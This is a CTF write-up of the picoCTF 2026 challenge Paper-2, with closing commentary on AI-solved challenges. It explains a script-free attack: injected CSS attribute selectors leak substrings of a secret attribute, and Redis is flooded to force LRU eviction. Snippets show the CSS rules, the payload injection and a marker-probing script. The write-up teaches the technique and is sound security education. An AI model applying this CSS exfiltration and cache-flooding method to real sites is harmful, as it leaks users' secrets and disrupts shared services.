Foreword
PicoCTF is one of the largest CTFs that takes place every year in March. It's run by Carnegie Mellon University and caters to all difficulty levels. Pico was one of the first large CTFs I ever played, and being able to place top 3 in the US HS/MS bracket is a dream come true.
However, this year was one of the weakest years of PicoCTF, as everything was "sloppable" or easily solved by AI. If you'd like to skip straight to my thoughts on the competition, check out Addressing the slop below.
Despite everything being AI-solvable, ehhthing managed to make another extremely difficult challenge. If you're not familiar, ehhthing is the creator of two notoriously hard challenges from previous years of PicoCTF:
secure-email-service (2025): Inject headers to get the admin to sign and send your XSS payload, then steal the flag.
elements (2024): Craft a valid XSS element chain in the game to execute JS, then bypass the strict CSP and leak the flag via a side-channel/timing-based exfiltration.
Below is my writeup on how my team (me, Mr-MPH, JT314, S3af, Programmer_user) solved the hardest challenge in the event.
Paper-2
picoCTF{i_l1ke_frames_on_my_canvas_[REDACTED]}

We are provided source for this challenge:
The file structure is standard for a Bun application; nothing actually important here.
This challenge is a sequel to Paper-1, where you had to use CSS selectors to conditionally render <object> tags in the DOM, then count visible frames with JavaScript to binary-search each secret character without network exfiltration.
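As a toy illustration of that idea (not the actual Paper-1 solver), binary-searching a single hex character via yes/no oracle queries looks like this. The `oracle` callable is a stand-in for the frame-counting trick:

```python
# Toy sketch: binary-search one hex character, assuming an oracle that
# answers "is the secret char <= this char?" (in Paper-1 that answer came
# from counting visible frames, not from a function call).
HEX = "0123456789abcdef"

def binary_search_char(oracle):
    lo, hi = 0, len(HEX) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(HEX[mid]):   # "is the secret char <= HEX[mid]?"
            hi = mid
        else:
            lo = mid + 1
    return HEX[lo]

secret_char = "b"
found = binary_search_char(lambda c: secret_char <= c)
print(found)  # recovers "b" in at most 4 queries
```

Four queries per character instead of sixteen, which is why the binary-search framing mattered in Paper-1.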
Understanding index.ts
This file contains all the program's logic, but only a few sections are crucial to understanding the challenge's constraints.
Content Security Policy (CSP)
Content Security Policy (CSP) is a browser security mechanism that restricts what content can be loaded or executed on a page.
```ts
const headers = (type: string) => {
    return {
        headers: {
            'Content-Type': type,
            'Content-Security-Policy': [
                "default-src 'self' 'unsafe-inline'",
                "script-src 'none'",
                // …
            ].join('; '),
            'X-Content-Type-Options': 'nosniff'
        }
    }
}
```

Every response is served with this CSP, which eliminates all JavaScript execution vectors. This is a major constraint to take note of: we can't use fetch, XHR, eval, or event handlers to exfil data.
Bot Execution
```ts
const visit = async (url: string) => {
    // …
    await redis.set('browser_open', 'true');
    const secret = randomBytes(16).toString('hex');
    let browser: Browser | null = null;
    const userDataDir = await mkdtemp(join(tmpdir(), 'paper-'));
    try {
        browser = await puppeteer.launch({
            executablePath: '/usr/bin/google-chrome',
            args: [
                // …
                '--no-sandbox',
                '--disable-gpu',
                '--js-flags=--noexpose_wasm,--jitless',
                '--host-rules="MAP paper.local 127.0.0.1"',
                // …
            ],
            headless: true,
            pipe: true,
            userDataDir
        });
        await browser.setCookie({
            name: 'secret',
            value: secret,
            domain: host,
            sameSite: 'Strict'
            // …
        });
        const page = await browser.newPage();
        await redis.set('secret', secret, 'EX', 60);
        await page.goto(url);
        await Bun.sleep(61000);
    } catch (e) {}
    await redis.del('secret');
    await redis.del('browser_open');
}
```

This is where the challenge larps as a victim. More specifically, it:
- Generates a fresh 32-char secret each time
- Stores it in Redis (60s TTL) and sets it as a cookie in a fresh Chrome instance
- The bot then visits the attacker's URL and sleeps for 61 seconds
- After the 61-second nap, the secret is deleted from Redis and the `browser_open` flag is cleared
- Each subsequent visit gets a completely new secret; there is no persistence whatsoever
File Uploading
```ts
'/upload': {
    POST: async (req: BunRequest): Promise<Response> => {
        // …
        const file = form.get('file');
        if (!file || !(file instanceof File) || !file.size || file.size > 2 ** 16) {
            return new Response('no file upload!', headers('text/plain'));
        }
        const id = await redis.incr('current-id');
        const data = JSON.stringify([file.type, (await file.bytes()).toBase64()]);
        // …
        await redis.set(`file|${id}`, data, 'EX', 10 * 60);
        return Response.redirect(`/paper/${id}`);
    }
},
```

The server accepts arbitrary file uploads up to 64KB. Files are then stored in Redis with a 10-minute TTL.
Another key thing to note: there is no limit on the number of files you can upload.
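A stdlib-only upload helper might look like the sketch below (the helper names and the multipart layout are my own; the team's actual script differs). It posts one "file" field to /upload and pulls the Redis id out of the /paper/<id> redirect:

```python
# Hypothetical upload helper, assuming the /upload endpoint shown above.
import urllib.request
import uuid

def build_multipart(content: bytes, mime="text/css"):
    # Minimal multipart/form-data body with a single "file" field.
    boundary = uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="f"\r\n'
        f"Content-Type: {mime}\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"

def upload(base, content: bytes, mime="text/css"):
    assert len(content) <= 2 ** 16, "server rejects files over 64KB"
    body, ctype = build_multipart(content, mime)
    req = urllib.request.Request(f"{base}/upload", data=body,
                                 headers={"Content-Type": ctype}, method="POST")
    with urllib.request.urlopen(req) as r:   # follows redirect to /paper/<id>
        return r.url.rsplit("/", 1)[-1]      # the Redis file id
```

With unlimited uploads, this one helper is enough to plant markers, CSS bundles, and garbage flood files alike.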
File Serving
```ts
'/paper/:id': async (req: BunRequest<'/paper/:id'>): Promise<Response> => {
    const res = await redis.get(`file|${req.params.id}`);
    // …
    if (!res) return new Response('not found!', headers('text/plain'));
    const [type, data] = JSON.parse(res) as [string, string];
    return new Response(Buffer.from(data, 'base64'), headers(type));
},
```

This serves the uploaded files to the bot (keep in mind CSP still applies). Even if you upload HTML or JS files, scripts can't run because of the script-src 'none' policy. However, CSS files are still evaluated, and CSS has more power than you might think (foreshadowing).
Secret Exposure
```ts
'/secret': async (req: BunRequest): Promise<Response> => {
    const secret = req.cookies.get('secret') || '0123456789abcdef'.repeat(2);
    const payload = new URL(req.url, 'http://127.0.0.1').searchParams.get('payload') || '';
    return new Response(
        `<body secret="${secret}">${secret}\n${payload}</body>`,
        headers('text/html')
    );
},
```

This returns HTML with the secret placed in a body attribute: `<body secret="...">`.
The main issue here is you cannot read this attribute with JavaScript (CSP blocks it).
Flag Submission
```ts
'/flag': async (req: BunRequest): Promise<Response> => {
    const guess = new URL(req.url, 'http://127.0.0.1').searchParams.get('secret');
    // …
    const secret = await redis.getdel('secret');
    if (secret && secret === guess) {
        return new Response(Bun.env.FLAG || 'picoctf{flag}', headers('text/plain'));
    }
    return new Response('wrong', headers('text/plain'));
},
```

This checks your guess against the stored value using getdel(), which atomically (holy vocab larp) retrieves and deletes the secret in one move. If you guess wrong, the secret is instantly deleted, which means you only get one call to /flag.
This is another critical constraint: we must recover the entire 32-char secret perfectly in one submission.
Bot Trigger
```ts
'/visit/:id': async (req: BunRequest<'/visit/:id'>): Promise<Response> => {
    // …
    if (await redis.get('browser_open')) return new Response('browser still open!');
    const res = await redis.get(`file|${req.params.id}`);
    // …
    if (!res) return new Response('not found!', headers('text/plain'));
    visit(`https://${host}/paper/${req.params.id}`);
    return new Response('visiting!', headers('text/plain'));
}
```

This starts a bot and sends it to load the specified file. The browser_open flag ensures only one bot instance runs at a time; if you call /visit/:id while a bot is still running, the second call is rejected.
That means we have to wait ~61 seconds (the bot's sleep time) between attempts. And once again: each visit generates a new secret and gives us exactly one 61-second window to leak information.
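Pacing the attack around that one-bot-at-a-time rule can be sketched like this (the polling helper is my own, not the team's script; only the URL shape and response strings come from the challenge source):

```python
# Sketch of triggering bot visits, assuming the /visit/:id endpoint above.
import time
import urllib.request

def should_retry(resp: bytes) -> bool:
    # /visit/:id answers "visiting!" on success and
    # "browser still open!" while a previous bot is still running.
    return resp != b"visiting!"

def trigger_visit(base, launcher_id, poll=5, fetch=None):
    # fetch is injectable for testing; defaults to a real HTTP GET
    fetch = fetch or (lambda u: urllib.request.urlopen(u).read())
    while should_retry(fetch(f"{base}/visit/{launcher_id}")):
        time.sleep(poll)  # wait out the ~61s window and try again
```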
The Constraint Landscape
That's a lot of information to process, so let's summarize the key constraints:
Execution:
- JS is completely blocked by CSP
- CSS can be evalled
- Each bot visit lasts exactly 61 seconds
- Only one bot can run at a time (~61 second gaps between visits)
- Secrets are generated fresh for each visit
Flag Submission:
- You MUST guess the full 32-char secret in one attempt
- Wrong guess == secret nuked (via `getdel()`)
- 32 hex chars means 16^32 ≈ 3.4 × 10^38 possibilities, rendering brute force impossible
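A quick sanity check on that keyspace number:

```python
# 32 hex characters, 16 possibilities each = a 128-bit keyspace
keyspace = 16 ** 32
print(keyspace)           # 340282366920938463463374607431768211456
print(f"{keyspace:.2e}")  # 3.40e+38
```

Guessing is simply not on the table; we have to leak the secret.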
Resource:
- Files stay in Redis for 10 minutes
- You can upload unlimited test files
- Redis is a shared cache for everything: uploaded files, markers, and the secret itself
Quick Detour
```yaml
services:
  redis:
    image: redis:7-alpine
    command: redis-server --maxmemory 512M --maxmemory-policy allkeys-lru --save "" --appendonly no
  web:
    build: .
    init: true
    ports:
      - 8443:443
```

The main issue is that CSP is brutal: literally nothing executes but CSS. But the docker-compose does give us something useful: allkeys-lru.
allkeys-lru (Least Recently Used) is a Redis eviction policy: when the 512MB limit is reached, Redis automatically deletes the least recently accessed keys first. Keys that get read stay "fresh"; keys nobody touches are first on the chopping block.
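A toy model makes the eviction behavior concrete (real Redis approximates LRU by sampling keys rather than keeping a perfect order, but the effect is the same for our purposes):

```python
# Toy allkeys-lru: touched keys survive, untouched keys get evicted first
# once the capacity cap is hit.
from collections import OrderedDict

class LRUCache:
    def __init__(self, capacity):
        self.capacity, self.d = capacity, OrderedDict()

    def set(self, k, v):
        self.d[k] = v
        self.d.move_to_end(k)
        while len(self.d) > self.capacity:
            self.d.popitem(last=False)   # evict least recently used

    def get(self, k):
        if k in self.d:
            self.d.move_to_end(k)        # any access refreshes recency
            return self.d[k]
        return None

cache = LRUCache(3)
for k in ("marker_a", "marker_b", "marker_c"):
    cache.set(k, "data")
cache.get("marker_a")          # the bot "fetched" this marker
cache.set("garbage", "flood")  # the flood pushes something out
print("marker_b" in cache.d)   # False: untouched marker got evicted
print("marker_a" in cache.d)   # True: touched marker survived
```

Survival after a flood therefore encodes one bit per key: "was this key accessed recently or not?"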
The Realization
Remember how CSP blocks all JavaScript but CSS still gets evaluated? And the /secret endpoint places the secret directly in the HTML as <body secret="...">?
CSS has attribute selectors - [secret^="a"] (starts with), [secret$="f"] (ends with), and [secret*="abc"] (contains). This means we can conditionally load resources based on the secret's value. If we upload a marker file to Redis and write CSS like this:
```css
body[secret*="abc"] { background-image: url(/paper/123); }
```

The bot will only fetch /paper/123 if "abc" actually appears in the secret. That redis.get() call makes the key "recently accessed." If the selector doesn't match, the file never gets requested and sits untouched in Redis.
So we now have a way to check if any short string exists inside the secret, all without a single line of JavaScript.
CSS as an Oracle
The naive approach is one selector per character per position (e.g. body[secret^="a"], body[secret^="b"], etc.). But that only leaks one character per bot visit, and with 32 characters and 61-second windows, that's ~30 minutes of time we do NOT have. We need to go wider.
The first thing we tried was dumping all our selectors into one background rule:
```css
body[secret*="abc"] { background: url('/paper/marker_abc'); }
body[secret*="abd"] { background: url('/paper/marker_abd'); }
body[secret*="abe"] { background: url('/paper/marker_abe'); }
```

However, this didn't work: background only holds one value per element, so if multiple selectors match, the last one wins and only that one marker gets loaded. We need every matching selector to fire on its own.
We can fix this by making it so each selector sets a CSS custom property to a url(), and a trigger element references all of them. Only the variables that got set cause HTTP requests:
```css
body[secret*="abc"] { --m_abc: url('/paper/marker_abc'); }
body[secret*="abd"] { --m_abd: url('/paper/marker_abd'); }
body[secret*="abe"] { --m_abe: url('/paper/marker_abe'); }
/* trigger element loads all matched markers */
#t { background-image: var(--m_abc, none), var(--m_abd, none), var(--m_abe, none); }
```

CSS custom properties (aka CSS variables) are values you define with --name and reference with var(--name, fallback). The key behavior here: if a variable was never set (because its selector didn't match), var() falls back to none, which means no HTTP request. This lets us stack thousands of selectors without them clobbering each other.
So now every matching selector independently triggers a fetch. With that problem solved, we can test much more than single characters:
- Trigrams (`body[secret*="abc"]`) - every 3-char hex combo that appears anywhere in the secret. The ~30 overlapping trigrams of a 32-char secret are enough to reconstruct it entirely.
- Bigrams (`body[secret*="ab"]`) - coarser but more reliable; these fill gaps where the trigram signal is weak.
- Prefix/suffix (`body[secret^="ab"]`, `body[secret$="ef"]`) - these anchor the start and end of the secret, which `*=` (contains) selectors alone can't pin down.
- Controls - `body[secret]` (always matches, since the attribute exists) and `body[secret*="ggg"]` (never matches, since `g` isn't a hex char). These are important for calibrating the noise later.
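These selector families can be generated mechanically. Here's a sketch for the trigram family, chunked to stay under the upload cap (the marker paths are hypothetical placeholders; in the real attack each marker id came back from /upload):

```python
# Sketch: generate one custom-property rule per hex trigram, then chunk
# the rules into CSS files that fit under the 64KB upload limit.
from itertools import product

HEX = "0123456789abcdef"

def make_rules():
    for tri in ("".join(p) for p in product(HEX, repeat=3)):
        # each rule only sets a custom property, so matches don't clobber
        yield f'body[secret*="{tri}"] {{ --m_{tri}: url("/paper/marker_{tri}"); }}'

def bundle(rules, limit=60_000):   # stay comfortably below 64KB
    buf, size = [], 0
    for rule in rules:
        if size + len(rule) + 1 > limit:
            yield "\n".join(buf)
            buf, size = [], 0
        buf.append(rule)
        size += len(rule) + 1
    if buf:
        yield "\n".join(buf)

bundles = list(bundle(make_rules()))
print(len(bundles))  # a handful of sub-64KB CSS files covering all 4096 trigrams
```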
Each marker gets replicated 3× to reduce variance, which comes out to ~5,000 total markers in Redis. We bundle the selectors into CSS files (~220 selectors each, to stay below the 64KB upload limit) and chain it all together with a launcher HTML file:
```html
<html>
<head>
    <link rel="stylesheet" href="/paper/css_bundle_0">
    <link rel="stylesheet" href="/paper/css_bundle_1">
    <!-- ... ~25 CSS bundles -->
</head>
<body>
    <div id="trig0" style="width:1px;height:1px"></div>
    <div id="trig1" style="width:1px;height:1px"></div>
    <!-- one trigger div per bundle -->
</body>
</html>
```

This introduces a new problem: the bot visits /paper/:id, not /secret, and the secret attribute only exists on the /secret endpoint. So the launcher uses a meta refresh to redirect to /secret?payload=<link href=...>, injecting our CSS <link> tags into the secret page via the payload parameter. Now the bot evaluates our CSS against a page that actually has <body secret="...">.
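The redirect trick can be sketched as follows (bundle ids are placeholders; the exact launcher markup the team used may differ):

```python
# Sketch: build a launcher page that meta-refreshes to /secret, smuggling
# our <link> tags in via the ?payload= query parameter.
from urllib.parse import quote

def build_launcher(bundle_ids):
    links = "".join(
        f'<link rel="stylesheet" href="/paper/{i}">' for i in bundle_ids
    )
    target = "/secret?payload=" + quote(links)
    return f'<meta http-equiv="refresh" content="0;url={target}">'

html = build_launcher(["101", "102"])
print(html)
```

Because /secret reflects payload unsanitized into the page body, the links render right next to `<body secret="...">`, and the attribute selectors can finally see the secret.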
Cache Eviction as a Side-Channel
Our teammate S3af kept talking about a side-channel vuln (which never existed) while we were hunting for bugs, so it was quite funny to me that there ended up being a genuine side-channel element in this challenge.
The cache eviction element has two phases:
1. Before triggering the bot, we prefill Redis with 4,200 garbage files (each ~65KB) to push memory close to the 512MB limit. Our markers and CSS bundles will be competing for space, so we re-upload the CSS bundles and launcher after the prefill so they don't get evicted before the bot even visits.
2. Then we trigger the bot. The bot visits our launcher, the CSS evaluates, and the matching markers get fetched (making them "recently accessed"). After waiting ~10 seconds for the CSS to fully evaluate, we hit Redis with a second wave of 1,400 more garbage files. This tips Redis over the edge and forces LRU eviction; the untouched markers, i.e. the ones whose selectors didn't match, get evicted first.
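The two phases line up into a timeline like this (the counts come from the writeup; all the callables are hypothetical stand-ins for the real script's helpers):

```python
# Timeline sketch of the two-phase eviction attack. upload, upload_payloads,
# and trigger_visit are injected placeholders, not real implementations.
import time

GARBAGE = b"A" * 65_000  # ~65KB filler per garbage file

def run_eviction(upload, upload_payloads, trigger_visit, sleep=time.sleep):
    for _ in range(4_200):        # phase 1: prefill near the 512MB cap
        upload(GARBAGE)
    ids = upload_payloads()       # re-upload bundles AFTER the prefill
    trigger_visit(ids)            # bot visit touches only the matched markers
    sleep(10)                     # give the CSS time to evaluate fully
    for _ in range(1_400):        # phase 2: tip Redis into LRU eviction
        upload(GARBAGE)
```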
Then we probe every marker. We blast all ~5,000 with concurrent requests: if the file comes back, it survived; if we get "not found!", it was evicted:
```python
from concurrent.futures import ThreadPoolExecutor

import requests

session = requests.Session()

def probe_markers(base, markers, workers=900, timeout=2):
    def check(m):
        r = session.get(f"{base}/paper/{m.paper_id}", timeout=timeout)
        return m if r.status_code == 200 and r.content != b"not found!" else None
    with ThreadPoolExecutor(max_workers=workers) as ex:
        results = ex.map(check, markers)
    return [m for m in results if m is not None]
```

Each run gives us around ~50–60 survivors out of thousands. Those survivors are the markers whose CSS selectors matched the secret.
Reconstructing the Secret
New problem: you can't just take the surviving trigrams and stitch them together, because LRU eviction is noisy. Some markers survive by luck, and some get evicted despite being touched (usually ones uploaded early that aged out anyway). Naive reconstruction produces a LOT of garbage.
Why naive doesn't work
Still confused? Let me elaborate further...
Say trigrams abc, bcd, and cde all survived; the secret probably contains abcde. But what if xyz also survived by chance? Now you have a false branch with no way to tell which path is real. With 50+ survivors and only 32 chars of secret, there are many spurious (holy membean word) trigrams messing with the signal.
And we can't just rerun the attack and intersect results, since each bot visit generates a completely new secret; every run leaks information about a different string.
Control calibration
All of that is why control markers matter. The "always-match" controls will tell us "ok, what does survival look like for a marker that was accessed?" and the "never-match" controls tell us the opposite.
For each control we check how many of its 3 replicas survived:
```python
from math import log

# build survival histograms for controls
t_hist = [0, 0, 0, 0]  # indices 0..3 (replica survival counts)
f_hist = [0, 0, 0, 0]
for ctrl in always_match_controls:
    k = sum(1 for r in ctrl.replicas if r in alive_ids)
    t_hist[k] += 1
for ctrl in never_match_controls:
    k = sum(1 for r in ctrl.replicas if r in alive_ids)
    f_hist[k] += 1

# log-likelihood ratio: how much evidence does k survivors provide?
# (zero counts would need smoothing to avoid log(0))
llr = [log(t_hist[k] / sum(t_hist)) - log(f_hist[k] / sum(f_hist))
       for k in range(4)]
```

Log-likelihood ratio (LLR) measures how much a piece of evidence supports one hypothesis over another. Here, if a marker has 3/3 replicas alive and the LLR for k=3 is +2.1, that's strong evidence the selector matched. If it has 0/3 alive and the LLR for k=0 is -1.8, that's strong evidence it didn't. Values near 0 are inconclusive.
If most "always-match" controls have about 2–3 replicas alive and most "never-match" controls have 0–1, we have a clean run. The LLR table maps any marker's replica survival count directly to a confidence score.
I definitely suggest you look into this if you didn't understand my explanation!
Age bias
Here is our bajillionth problem: markers uploaded first sit in Redis longer and are more likely to get evicted regardless of whether they were touched. A marker at index 50 that survives carries way more signal than one at index 4,900 that survives, because the early one had to beat longer odds.
We bin markers into 24 groups by upload order, compute per-bin survival baselines from the controls, then normalize scores so early survivors get the boost they earned.
After scoring, we clip all LLR values to ±1.5 so no single marker can dominate the final ranking. This prevents one noisy outlier from throwing off the entire reconstruction of the secret.
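The binning-plus-clipping step can be sketched as follows (the function name, bin count, and clip value mirror the writeup's description, but the exact scoring code is illustrative, not the team's):

```python
# Sketch of the age-bias correction: bin markers by upload order, subtract
# each bin's control baseline, then clip so no single marker dominates.
def age_corrected_scores(markers, raw_llr, baseline_per_bin, n_bins=24, clip=1.5):
    total = len(markers)
    scores = {}
    for idx, m in enumerate(markers):           # markers in upload order
        b = min(idx * n_bins // total, n_bins - 1)  # which upload-order bin
        s = raw_llr[m] - baseline_per_bin[b]        # normalize vs. controls
        scores[m] = max(-clip, min(clip, s))        # clip to +/-1.5
    return scores
```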
Beam search
Now, with calibrated scores for every marker, we can assemble 32-char candidates via beam search (thank you tiktok video!):
Beam search is a heuristic search algorithm that builds solutions step by step, but only keeps the top k most promising candidates (the "beam width") at each step. Unlike brute force (which explores everything) or greedy search (which only keeps the single best candidate), beam search balances thoroughness with speed. Here we use a beam width of 3,000.
- Seed with all 4,096 possible 3-char hex prefixes, scored by their prefix + trigram LLRs
- Extend each candidate by one hex char, adding the new trigram and bigram scores
- Prune to the top 3,000 candidates by combined score
- Repeat until we hit 32 chars
- Add suffix scores and re-rank
If a trigram already appeared earlier in a candidate, we penalize extending with it again. Without this, beam search latches onto high-scoring trigrams and keeps looping, producing crap like abcabcabc... instead of the actual secret.
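A minimal version of that beam search, using only trigram scores (the real solver also mixes in bigram, prefix, and suffix scores; the penalty and default values here are illustrative):

```python
# Minimal beam-search sketch over hex strings with a repeat penalty.
HEX = "0123456789abcdef"

def beam_search(tri_score, length=32, width=3000, repeat_penalty=1.0):
    # seed with every possible 3-char prefix
    beam = [(tri_score.get(p, 0.0), p)
            for p in (a + b + c for a in HEX for b in HEX for c in HEX)]
    beam.sort(reverse=True)
    beam = beam[:width]
    while len(beam[0][1]) < length:
        nxt = []
        for score, cand in beam:
            for ch in HEX:
                tri = cand[-2:] + ch
                s = score + tri_score.get(tri, -0.5)  # unseen trigram: mild penalty
                if tri in cand:                       # discourage looping on
                    s -= repeat_penalty               # already-used trigrams
                nxt.append((s, cand + ch))
        nxt.sort(reverse=True)
        beam = nxt[:width]                            # prune to the beam width
    return beam[0][1]
```

Feeding it the trigram set of a known string (all scored equally) recovers that string, which is the clean-signal version of what the calibrated LLR scores approximate.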
Flag :)
Finally, the program outputs a ranked list of candidates and submits #1 to /flag. Once again, since getdel() nukes the secret on any attempt, there is no second chance...

If you wanna check out the full (heavily ai-slopped) solve script, it's here. Note that it takes ~10 runs for it to work.
CSS attribute selectors leak which substrings exist in the secret by selectively fetching Redis keys. Flood Redis to trigger LRU eviction, probe which markers survived, score with log-likelihood ratios, and beam search the 32-char secret.
Addressing the slop 🗑️
Paper-2 was by far the best challenge in picoCTF 2026. But the rest of the event was disappointing: 69/70 challenges could be solved by just feeding the challenge to an LLM and asking for the flag.
There was a HUGE lack of a difficulty curve; most challenges were either trivial/sloppable or Paper-2. The real issue is that authors aren't putting proper effort into LLM-proofing their challenges. The reason ehhthing's challenges consistently resist this is that the vulns aren't contrived.
Overall in the CTF community there's a sense of outrage against AI slop and the fact that everything is sloppable.
As BraydenPikachu put it during DiceCTF 2026 quals (paraphrasing): authors make their challenges using AI, ChatGPT retains that information, and it can then solve the same AI-made challenge 10x faster; it's a never-ending cycle. The takeaway: yes, we can have beginner-friendly competitions, but we also have to combat slop by actually authoring the challenges ourselves.
The issue isn't THAT bad
Many people were clowning on DiceCTF on X/Twitter because a lot of the challenges were sloppable. Yes, that's an issue, but there were still some unsolved ones that made the difference in the top 10 of the leaderboard: kernel pwn, hard blockchain, etc., and those still require a huge skill diff. It's not over just yet for CTFs.
I also think there need to be changes in what the motivations for CTFs are.
Auto Solvers
PicoCTF did introduce me to the idea of making a proper autosolver. For example, C-Bass's team Cosmic Bit Flip took 1st with their autosolver.

I was so utterly impressed with this, yet saddened that CTF had come to this. Props to C-Bass for building a well-designed autosolver against picoCTF; they genuinely deserved first for out-strategizing me and my qAgent (blog on that soon lol).
Closing thoughts
Genuinely, shout-out to my goated team. We were working till 3 AM trying to solve. And massive respect to ehhthing for creating challenges that actually make you think instead of AI-larping.
(Three more genuinely's and I would be on the News 😭)
People ask me why I'm so addicted to CTFs and it's things like this that make it beautiful.